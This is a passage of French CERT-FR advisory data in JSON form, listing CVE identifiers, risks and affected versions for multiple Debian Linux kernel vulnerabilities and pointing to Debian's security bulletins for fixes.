"url": "https://www.cve.org/CVERecord?id=CVE-2026-22984"
},
{
"name": "CVE-2025-68757",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68757"
},
{
"name": "CVE-2026-23033",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23033"
},
{
"name": "CVE-2026-22977",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22977"
},
{
"name": "CVE-2026-23003",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23003"
},
{
"name": "CVE-2025-68766",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68766"
},
{
"name": "CVE-2026-23076",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23076"
},
{
"name": "CVE-2025-71123",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71123"
},
{
"name": "CVE-2025-68372",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68372"
},
{
"name": "CVE-2026-23010",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23010"
},
{
"name": "CVE-2025-71137",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71137"
},
{
"name": "CVE-2026-23084",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23084"
},
{
"name": "CVE-2026-22979",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22979"
},
{
"name": "CVE-2026-23011",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23011"
},
{
"name": "CVE-2026-23110",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23110"
},
{
"name": "CVE-2025-71120",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71120"
},
{
"name": "CVE-2026-23060",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23060"
},
{
"name": "CVE-2025-68282",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68282"
},
{
"name": "CVE-2025-68817",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68817"
},
{
"name": "CVE-2025-71119",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71119"
},
{
"name": "CVE-2025-68787",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68787"
},
{
"name": "CVE-2025-68782",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68782"
},
{
"name": "CVE-2025-71197",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71197"
},
{
"name": "CVE-2025-68758",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68758"
},
{
"name": "CVE-2026-23031",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23031"
},
{
"name": "CVE-2025-71113",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71113"
},
{
"name": "CVE-2025-71127",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71127"
},
{
"name": "CVE-2026-23102",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23102"
},
{
"name": "CVE-2026-22998",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22998"
},
{
"name": "CVE-2025-68340",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68340"
},
{
"name": "CVE-2025-40110",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40110"
},
{
"name": "CVE-2025-68798",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68798"
},
{
"name": "CVE-2025-68336",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68336"
},
{
"name": "CVE-2023-52975",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52975"
},
{
"name": "CVE-2026-23097",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23097"
},
{
"name": "CVE-2025-68819",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68819"
},
{
"name": "CVE-2026-23021",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23021"
},
{
"name": "CVE-2025-68732",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68732"
},
{
"name": "CVE-2026-23093",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23093"
},
{
"name": "CVE-2025-71183",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71183"
},
{
"name": "CVE-2025-68371",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68371"
},
{
"name": "CVE-2025-68211",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68211"
},
{
"name": "CVE-2025-71091",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71091"
},
{
"name": "CVE-2025-68263",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68263"
},
{
"name": "CVE-2025-68800",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68800"
},
{
"name": "CVE-2025-68261",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68261"
},
{
"name": "CVE-2022-48744",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48744"
},
{
"name": "CVE-2025-71149",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71149"
},
{
"name": "CVE-2025-68767",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68767"
},
{
"name": "CVE-2025-68727",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68727"
},
{
"name": "CVE-2026-23080",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23080"
},
{
"name": "CVE-2025-38361",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38361"
},
{
"name": "CVE-2025-68264",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68264"
},
{
"name": "CVE-2025-68764",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68764"
}
],
"initial_release_date": "2026-02-13T00:00:00",
"last_revision_date": "2026-02-13T00:00:00",
"links": [],
"reference": "CERTFR-2026-AVI-0167",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2026-02-13T00:00:00.000000"
}
],
"risks": [
{
"description": "D\u00e9ni de service"
},
{
"description": "Atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es"
},
{
"description": "\u00c9l\u00e9vation de privil\u00e8ges"
}
],
"summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans le noyau Linux de Debian LTS. Elles permettent \u00e0 un attaquant de provoquer une \u00e9l\u00e9vation de privil\u00e8ges, une atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es et un d\u00e9ni de service.",
"title": "Multiples vuln\u00e9rabilit\u00e9s dans le noyau Linux de Debian LTS",
"vendor_advisories": [
{
"published_at": "2026-02-10",
"title": "Bulletin de s\u00e9curit\u00e9 Debian LTS DLA-4476-1",
"url": "https://lists.debian.org/debian-lts-announce/2026/02/msg00017.html"
},
{
"published_at": "2026-02-10",
"title": "Bulletin de s\u00e9curit\u00e9 Debian LTS DLA-4475-1",
"url": "https://lists.debian.org/debian-lts-announce/2026/02/msg00016.html"
}
]
}
CERTFR-2026-AVI-0166
Vulnerability from certfr_avis - Published: 2026-02-13 - Updated: 2026-02-13
De multiples vulnérabilités ont été découvertes dans le noyau Linux de Debian. Elles permettent à un attaquant de provoquer une élévation de privilèges, une atteinte à la confidentialité des données et un déni de service.
Solutions
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
NoneImpacted products
References
| Title | Publication Time | Tags | ||||||
|---|---|---|---|---|---|---|---|---|
|
||||||||
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "Debian trixie versions ant\u00e9rieures \u00e0 6.12.69-1",
"product": {
"name": "Debian",
"vendor": {
"name": "Debian",
"scada": false
}
}
},
{
"description": "Debian bookworm versions ant\u00e9rieures \u00e0 6.1.162-1",
"product": {
"name": "Debian",
"vendor": {
"name": "Debian",
"scada": false
}
}
}
],
"affected_systems_content": null,
"content": "## Solutions\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des correctifs (cf. section Documentation).",
"cves": [
{
"name": "CVE-2025-71075",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71075"
},
{
"name": "CVE-2025-71086",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71086"
},
{
"name": "CVE-2025-22083",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22083"
},
{
"name": "CVE-2025-71065",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71065"
},
{
"name": "CVE-2025-22107",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22107"
},
{
"name": "CVE-2025-71134",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71134"
},
{
"name": "CVE-2026-23098",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23098"
},
{
"name": "CVE-2025-68749",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68749"
},
{
"name": "CVE-2025-71094",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71094"
},
{
"name": "CVE-2025-68788",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68788"
},
{
"name": "CVE-2025-68778",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68778"
},
{
"name": "CVE-2026-23054",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23054"
},
{
"name": "CVE-2025-71064",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71064"
},
{
"name": "CVE-2026-23072",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23072"
},
{
"name": "CVE-2025-68725",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68725"
},
{
"name": "CVE-2025-68795",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68795"
},
{
"name": "CVE-2025-68349",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68349"
},
{
"name": "CVE-2025-38104",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38104"
},
{
"name": "CVE-2025-68380",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68380"
},
{
"name": "CVE-2026-23069",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23069"
},
{
"name": "CVE-2023-53421",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53421"
},
{
"name": "CVE-2026-22992",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22992"
},
{
"name": "CVE-2025-71071",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71071"
},
{
"name": "CVE-2025-71191",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71191"
},
{
"name": "CVE-2025-68728",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68728"
},
{
"name": "CVE-2025-68364",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68364"
},
{
"name": "CVE-2025-71087",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71087"
},
{
"name": "CVE-2025-40039",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40039"
},
{
"name": "CVE-2025-71135",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71135"
},
{
"name": "CVE-2025-68746",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68746"
},
{
"name": "CVE-2025-68773",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68773"
},
{
"name": "CVE-2025-71133",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71133"
},
{
"name": "CVE-2026-23020",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23020"
},
{
"name": "CVE-2025-68796",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68796"
},
{
"name": "CVE-2025-68804",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68804"
},
{
"name": "CVE-2025-68769",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68769"
},
{
"name": "CVE-2025-68794",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68794"
},
{
"name": "CVE-2025-71189",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71189"
},
{
"name": "CVE-2025-38408",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38408"
},
{
"name": "CVE-2025-71088",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71088"
},
{
"name": "CVE-2026-23090",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23090"
},
{
"name": "CVE-2026-23035",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23035"
},
{
"name": "CVE-2026-23064",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23064"
},
{
"name": "CVE-2025-38591",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38591"
},
{
"name": "CVE-2025-68806",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68806"
},
{
"name": "CVE-2025-71098",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71098"
},
{
"name": "CVE-2025-71078",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71078"
},
{
"name": "CVE-2025-71083",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71083"
},
{
"name": "CVE-2026-23061",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23061"
},
{
"name": "CVE-2026-23059",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23059"
},
{
"name": "CVE-2025-68813",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68813"
},
{
"name": "CVE-2026-23047",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23047"
},
{
"name": "CVE-2025-22121",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22121"
},
{
"name": "CVE-2025-68365",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68365"
},
{
"name": "CVE-2025-71085",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71085"
},
{
"name": "CVE-2025-71076",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71076"
},
{
"name": "CVE-2025-68344",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68344"
},
{
"name": "CVE-2025-71154",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71154"
},
{
"name": "CVE-2025-68257",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68257"
},
{
"name": "CVE-2025-71084",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71084"
},
{
"name": "CVE-2026-23094",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23094"
},
{
"name": "CVE-2026-23049",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23049"
},
{
"name": "CVE-2025-68347",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68347"
},
{
"name": "CVE-2025-68770",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68770"
},
{
"name": "CVE-2025-68814",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68814"
},
{
"name": "CVE-2025-68780",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68780"
},
{
"name": "CVE-2025-71081",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71081"
},
{
"name": "CVE-2026-23101",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23101"
},
{
"name": "CVE-2026-23099",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23099"
},
{
"name": "CVE-2025-71121",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71121"
},
{
"name": "CVE-2025-38022",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38022"
},
{
"name": "CVE-2025-71080",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71080"
},
{
"name": "CVE-2026-22989",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22989"
},
{
"name": "CVE-2026-23085",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23085"
},
{
"name": "CVE-2025-71136",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71136"
},
{
"name": "CVE-2025-68354",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68354"
},
{
"name": "CVE-2025-68801",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68801"
},
{
"name": "CVE-2025-71073",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71073"
},
{
"name": "CVE-2025-22090",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22090"
},
{
"name": "CVE-2025-68258",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68258"
},
{
"name": "CVE-2025-39871",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39871"
},
{
"name": "CVE-2026-23057",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23057"
},
{
"name": "CVE-2025-37926",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37926"
},
{
"name": "CVE-2025-71138",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71138"
},
{
"name": "CVE-2025-68291",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68291"
},
{
"name": "CVE-2025-71122",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71122"
},
{
"name": "CVE-2026-22991",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22991"
},
{
"name": "CVE-2025-71144",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71144"
},
{
"name": "CVE-2025-68822",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68822"
},
{
"name": "CVE-2025-38234",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38234"
},
{
"name": "CVE-2025-21946",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21946"
},
{
"name": "CVE-2025-68255",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68255"
},
{
"name": "CVE-2026-22980",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22980"
},
{
"name": "CVE-2025-71093",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71093"
},
{
"name": "CVE-2025-71102",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71102"
},
{
"name": "CVE-2026-23032",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23032"
},
{
"name": "CVE-2025-68759",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68759"
},
{
"name": "CVE-2026-23019",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23019"
},
{
"name": "CVE-2026-23055",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23055"
},
{
"name": "CVE-2025-68733",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68733"
},
{
"name": "CVE-2026-23005",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23005"
},
{
"name": "CVE-2025-68335",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68335"
},
{
"name": "CVE-2025-71079",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71079"
},
{
"name": "CVE-2026-23030",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23030"
},
{
"name": "CVE-2026-22997",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22997"
},
{
"name": "CVE-2025-71153",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71153"
},
{
"name": "CVE-2025-71196",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71196"
},
{
"name": "CVE-2025-68772",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68772"
},
{
"name": "CVE-2026-23078",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23078"
},
{
"name": "CVE-2025-71143",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71143"
},
{
"name": "CVE-2025-68785",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68785"
},
{
"name": "CVE-2025-71130",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71130"
},
{
"name": "CVE-2025-68808",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68808"
},
{
"name": "CVE-2025-68223",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68223"
},
{
"name": "CVE-2025-68783",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68783"
},
{
"name": "CVE-2025-71147",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71147"
},
{
"name": "CVE-2025-68724",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68724"
},
{
"name": "CVE-2026-23103",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23103"
},
{
"name": "CVE-2026-23074",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23074"
},
{
"name": "CVE-2025-71126",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71126"
},
{
"name": "CVE-2025-68786",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68786"
},
{
"name": "CVE-2025-71199",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71199"
},
{
"name": "CVE-2024-42079",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42079"
},
{
"name": "CVE-2025-68797",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68797"
},
{
"name": "CVE-2024-49968",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-49968"
},
{
"name": "CVE-2025-68358",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68358"
},
{
"name": "CVE-2025-68259",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68259"
},
{
"name": "CVE-2025-71125",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71125"
},
{
"name": "CVE-2026-23006",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23006"
},
{
"name": "CVE-2025-71108",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71108"
},
{
"name": "CVE-2025-68789",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68789"
},
{
"name": "CVE-2025-71069",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71069"
},
{
"name": "CVE-2026-23013",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23013"
},
{
"name": "CVE-2025-71195",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71195"
},
{
"name": "CVE-2026-22994",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22994"
},
{
"name": "CVE-2026-23083",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23083"
},
{
"name": "CVE-2026-23088",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23088"
},
{
"name": "CVE-2025-68774",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68774"
},
{
"name": "CVE-2026-23108",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23108"
},
{
"name": "CVE-2025-71180",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71180"
},
{
"name": "CVE-2025-38232",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38232"
},
{
"name": "CVE-2025-71194",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71194"
},
{
"name": "CVE-2025-71157",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71157"
},
{
"name": "CVE-2026-23023",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23023"
},
{
"name": "CVE-2026-22999",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22999"
},
{
"name": "CVE-2025-71082",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71082"
},
{
"name": "CVE-2026-23068",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23068"
},
{
"name": "CVE-2025-68765",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68765"
},
{
"name": "CVE-2026-23089",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23089"
},
{
"name": "CVE-2025-71132",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71132"
},
{
"name": "CVE-2026-23071",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23071"
},
{
"name": "CVE-2026-23056",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23056"
},
{
"name": "CVE-2025-71077",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71077"
},
{
"name": "CVE-2025-71140",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71140"
},
{
"name": "CVE-2025-22111",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22111"
},
{
"name": "CVE-2026-23063",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23063"
},
{
"name": "CVE-2026-23073",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23073"
},
{
"name": "CVE-2025-71114",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71114"
},
{
"name": "CVE-2026-23058",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23058"
},
{
"name": "CVE-2025-71067",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71067"
},
{
"name": "CVE-2025-71182",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71182"
},
{
"name": "CVE-2026-23038",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23038"
},
{
"name": "CVE-2025-71151",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71151"
},
{
"name": "CVE-2026-22990",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22990"
},
{
"name": "CVE-2026-23000",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23000"
},
{
"name": "CVE-2025-71186",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71186"
},
{
"name": "CVE-2025-68821",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68821"
},
{
"name": "CVE-2026-23026",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23026"
},
{
"name": "CVE-2025-68325",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68325"
},
{
"name": "CVE-2025-71190",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71190"
},
{
"name": "CVE-2025-71089",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71089"
},
{
"name": "CVE-2026-23107",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23107"
},
{
"name": "CVE-2025-68332",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68332"
},
{
"name": "CVE-2025-71104",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71104"
},
{
"name": "CVE-2026-22978",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22978"
},
{
"name": "CVE-2025-38129",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38129"
},
{
"name": "CVE-2026-23037",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23037"
},
{
"name": "CVE-2025-71101",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71101"
},
{
"name": "CVE-2026-23001",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23001"
},
{
"name": "CVE-2025-68367",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68367"
},
{
"name": "CVE-2025-68820",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68820"
},
{
"name": "CVE-2025-68740",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68740"
},
{
"name": "CVE-2025-68742",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68742"
},
{
"name": "CVE-2026-23025",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23025"
},
{
"name": "CVE-2024-46786",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-46786"
},
{
"name": "CVE-2025-68816",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68816"
},
{
"name": "CVE-2025-68357",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68357"
},
{
"name": "CVE-2025-68256",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68256"
},
{
"name": "CVE-2025-68777",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68777"
},
{
"name": "CVE-2025-71129",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71129"
},
{
"name": "CVE-2025-68254",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68254"
},
{
"name": "CVE-2025-39872",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39872"
},
{
"name": "CVE-2026-22982",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22982"
},
{
"name": "CVE-2025-71109",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71109"
},
{
"name": "CVE-2025-71118",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71118"
},
{
"name": "CVE-2025-71150",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71150"
},
{
"name": "CVE-2025-39721",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39721"
},
{
"name": "CVE-2026-23091",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23091"
},
{
"name": "CVE-2025-38718",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38718"
},
{
"name": "CVE-2025-71192",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71192"
},
{
"name": "CVE-2025-68776",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68776"
},
{
"name": "CVE-2025-71066",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71066"
},
{
"name": "CVE-2025-68799",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68799"
},
{
"name": "CVE-2025-68345",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68345"
},
{
"name": "CVE-2025-71097",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71097"
},
{
"name": "CVE-2025-71107",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71107"
},
{
"name": "CVE-2025-71111",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71111"
},
{
"name": "CVE-2026-23087",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23087"
},
{
"name": "CVE-2025-68802",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68802"
},
{
"name": "CVE-2025-71185",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71185"
},
{
"name": "CVE-2025-68811",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68811"
},
{
"name": "CVE-2026-23096",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23096"
},
{
"name": "CVE-2025-68337",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68337"
},
{
"name": "CVE-2025-68351",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68351"
},
{
"name": "CVE-2025-71131",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71131"
},
{
"name": "CVE-2025-40149",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40149"
},
{
"name": "CVE-2025-40164",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40164"
},
{
